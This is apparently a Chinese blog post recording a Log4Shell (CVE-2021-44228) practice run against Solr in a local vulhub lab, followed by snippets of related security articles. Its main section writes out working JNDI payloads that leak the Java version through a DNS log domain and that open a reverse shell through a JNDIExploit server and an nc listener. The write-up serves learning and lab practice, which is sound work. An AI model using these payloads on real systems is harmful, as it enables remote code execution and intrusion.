log4j2漏洞练习

雾魈

已于 2024-07-31 20:56:42 修改

阅读量187

点赞数 1

文章标签： log4j

于 2024-07-31 19:55:09 首次发布

本文链接：https://blog.csdn.net/weixin_69602647/article/details/140831110

版权

参考链接:https://mp.weixin.qq.com/s/2COe2VwHuHDywwqtekkWQQ

本地靶场启动命令:

systemctl start docker
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

在DNSlog平台请求一个dns域名：

构造:

${jndi:dns://${sys:java.version}.example.com}

利用JNDI发送DNS请求的Payload：

http://192.168.101.128:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.apjaaf.dnslog.cn}

访问:

dnslog抓到的数据:

得到的版本信息: 1.8.3

反弹shell:

要使用命令:

先运行exp

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.139.175

Kali开启监听6666端口:

nc -lvvp 6666

访问连接:

http://192.168.101.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.139.175:1389/Basic/ReverseShell/192.168.101.128/6666}

中转机记录::

反弹shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

雾魈

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

内网打靶练习(log4j2、私钥泄露)

博客地址 www.sec0nd.top

05-20

1441

文章目录靶机背景介绍getshell (log4j2 RCE)漏洞验证存在注入的点反弹shell域渗透靶机背景介绍搭建靶机的过程过几天我再写，先写一下复现的过程(最近有些懒了) web服务端：centos 192.168.80.130(外) 192.168.75.130(内) 内网的主机：Windows10 192.168.75. kali攻击机：kali 192.168.80.131 getshell (log4j2 RCE) 来看一下web服务端，是一个solr框架昂然后我们看一下so

Log4j2远程代码执行漏洞复现

qq_66105152的博客

07-31

414

构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录，我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!4. 可以发现 /solr/admin/cores?action= 这⾥有个参数可以传。3.用dnslog平台检测dns回显，看看有没有漏洞存在。获取子域名，我是 1ilobr.dnslog.cn。

参与评论您还未登录，请先登录后发表或查看评论

Apache Log4j 复现靶场

hackzkaq的博客

12-14

3317

`搜索公众号：白帽子左一，领配套练手靶场，全套安全课程及工具` 安全圈大动荡，新出现的漏洞危害性极大，此漏洞是可以执行任意代码，群里也流传了一句话：“这已经相当于黑客已经攻入计算机，可以为所欲为了“.很恐怖，一个漏洞的出现让多少人手忙脚乱。新出了漏洞很多人都会想着去复现漏洞，为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入复现，亲测可以直接拿shell。切记要遵守网络安全法靶场复现地址：https://hack.zkaq.cn/battle/target?id=5

Struts2框架下Log4j2漏洞检测方法分析与总结

Hacker_j1的博客

07-07

1188

叒有一段时间没写文章了，正好周末有时间就来写写，本文来讲讲有关SQL注入相关的知识点会尽可能详细的写出来，比较适合刚入门安全的小白进行学习，希望能在面试或实战中助你一臂之力。如有大佬发现文中内容有错误的地方恳请斧正！也欢迎各位师傅共同交流学习技术！

Log4j史诗级漏洞，我们这些小公司能做些什么？

程序新视界

12-11

6073

事件背景 12月10日，看到朋友圈中已经有人在通宵修改、上线系统了。随即，又看到阿里云安全、腾讯安全部门发出的官方报告：”Apache Log4j2存在远程代码执行漏洞“，且漏洞已对外公开。看到相关消息，马上爬起来把所有项目的日志系统过滤一遍，还好老项目采用的log4j，新项目采用的logback，没有中招。随后就看到朋友圈铺天盖地的相关消息。作为一个史诗级的事件，紧急修改漏洞是必然的。作为程序员，如果看到这则消息，连去核查一下系统都做不到，那真的不是一个合格的程序员。经历过这次事件，不仅是看热闹而已

如何看待 Apache Log4j 2 远程代码执行漏洞？

实验楼--动手做实验，轻松学IT！

12-30

226

如何看待 Apache Log4j 2 远程代码执行漏洞？

vulhub漏洞复现九_log4j/2

weixin_44193247的博客

01-11

2006

vulhub漏洞复现练习篇

靶机渗透练习07-HackMyVm Area51 (Log4j2复现)

Force~

03-31

2915

靶机地址：https://hackmyvm.eu/machines/machine.php?vm=Area51 网盘链接：https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r 1、主机探活 arp-scan -I eth0 -l （指定网卡扫）扫描局域网所有设备（所有设备IP、MAC地址、制造商信息） masscan 192.168.111.0/24 -p 80,22 （masscan 扫描的网段 -p 扫描端口号） netdiscover.

2021爆发Log4j史诗级Bug漏洞，我们这些小公司能做些什么？

a1472750149的博客

12-11

762

12月10日，看到朋友圈中已经有人在通宵修改、上线系统了。随即，又看到阿里云安全、腾讯安全部门发出的官方报告：”Apache Log4j2存在远程代码执行漏洞“，且漏洞已对外公开。看到相关消息，马上爬起来把所有项目的日志系统过滤一遍，还好老项目采用的log4j，新项目采用的logback，没有中招。随后就看到朋友圈铺天盖地的相关消息。作为一个史诗级的事件，紧急修改漏洞是必然的。作为程序员，如果看到这则消息，连去核查一下系统都做不到，那真的不是一个合格的程序员。经历过这次事件，不仅是看热闹而已，还

JavaWeb代码审计实战之迷你天猫商城系统详细分析版，实战应用级系统的Log4j2shell代码审计

Power7089的博客

08-22

2141

JavaWeb代码审计实战之迷你天猫商城系统详细分析版，实战应用级系统的Log4j2shell代码审计

WEB漏洞——XXE

qq_63594215的博客

04-12

934

本次文章主要介绍XXE漏洞的原理，利用以及防御的过程，另外还有介绍一点XML的基础知识，详情请见下文。a) xml，eXtensible Markup Language，可扩展标记语言，是一种标记语言，使用简单标记描述数据b) xml是一种非常灵活的语言，没有固定的标签，所有标签都可以自定义c) 通常，xml被用于信息的传递和记录，因此，xml经常被用于充当配置文件如果把HTML和XML进行对比的话，HTML进行对比的话，HTML旨在显示数据信息，而XML旨在用来进行数据的传输和存储。

Web 应用漏洞攻防

lemonalla的博客

04-18

737

Web 应用漏洞攻防实验目的了解常见 Web 漏洞训练平台；了解常见 Web 漏洞的基本原理；掌握 OWASP Top 10 及常见 Web 高危漏洞的漏洞检测、漏洞利用和漏洞修复方法；实验环境 WebGoat7.1/8.0 Juice Shop 实验要求（完成度）每个实验环境完成不少于 5 种不同漏洞类型的漏洞利用练习；（可选）使用不同于官方教程中的漏洞利用方法完成...

MySQL服务端恶意读取客户端文件漏洞分析并使用Golang编写简易蜜罐

孤城浪子的博客

03-07

3738

MySQL读取客户端文件漏洞分析并使用Golang编写简易蜜罐一、原理概述这并不是一个新鲜的漏洞，我也是为了学习Golang才又拿出来炒一遍冷饭。先大概说一下原理，MySQL客户端和服务端通信过程中是通过对话的形式来实现的，客户端发送一个操作请求，然后服务端根据客服端发送的请求来响应客户端，在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求，而是直...

SpirngBoot核心思想之一IOC

九离的博客

09-29

1439

IOC是 Spring Boot 及整个 Spring 框架的核心思想之一，它通过依赖注入机制解决了传统开发中对象管理的高耦合问题，增强了代码的模块化、可扩展性和可测试性。通过将控制权从程序转移到框架，开发者可以专注于业务逻辑，减少手动管理对象和依赖的繁琐工作。通过构造函数、Setter 或字段注入，Spring Boot 提供了多种灵活的 IOC 实现方式，适应不同场景下的开发需求。掌握 IOC 这一理念，将有助于我们构建更优雅、可维护的应用。

逆变器PQ控制模型、逆变器并网模型（Simulink）直流侧电压650V～2000V均可交流测电压为380V 有功功率和无功

10-10

逆变器PQ控制模型、逆变器并网模型（Simulink）直流侧电压650V～2000V均可交流测电压为380V 有功功率和无功功率可达10kW或10kVar，甚至更高

SpringBoot+Vue工厂生产设备维护管理系统答辩PPT.ppt

10-10

计算机毕业设计答辩PPT

CPA 税法马兆瑞基础班第10章-本章概述-PPT-8页.pdf